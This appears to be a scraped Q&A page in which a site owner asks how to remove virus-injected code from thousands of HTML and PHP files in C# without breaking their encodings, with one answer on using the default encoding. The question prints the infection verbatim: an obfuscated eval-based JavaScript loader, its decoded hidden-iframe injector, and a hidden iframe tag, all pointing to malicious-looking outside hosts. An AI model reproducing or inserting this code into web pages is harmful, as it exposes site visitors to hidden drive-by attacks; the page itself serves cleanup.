Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Can a file be read and written right back with small changes without knowing its encoding in C#?

I need to download from FTP over 5000 files being .html and .php files. I need to read each file and remove some stuff that was put there by virus and save it back to FTP.

I'm using following code:

string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
    content = sr.ReadToEnd();
    sr.Close();
}

using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
    sw.WriteLine(content);
    sw.Close();
}

I downloaded some files by hand and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I wouldn't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. PHP seems to be UTF-8 and HTML Windows-1250 but I would prefer to be sure to not break the files while trying to fix it. So is there a way that I wouldn't have to know/guess the encoding and it would let me remove virus links from web pages?

Edit. I'm trying to find and remove something like this:

var s=new String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u, 59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u, 23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}

which after decoding is

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

And when you visit webpage it tells you this (after decoding).

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

The script is added at last 3 lines and basically starts right after </html>var

The PHP script has more or less this type of line <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.

Not sure if there's any other way then to rewrite those files. But having to go thru 5000 files seems a bit too much and risky :-)

like image 317
MadBoy Avatar asked Feb 09 '12 21:02

MadBoy


1 Answers

Assuming that none of the files are UTF16 or UTF32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save it as Encoding.Default, which will round-trip any higher character correctly.

like image 192
SLaks Avatar answered Oct 12 '22 07:10

SLaks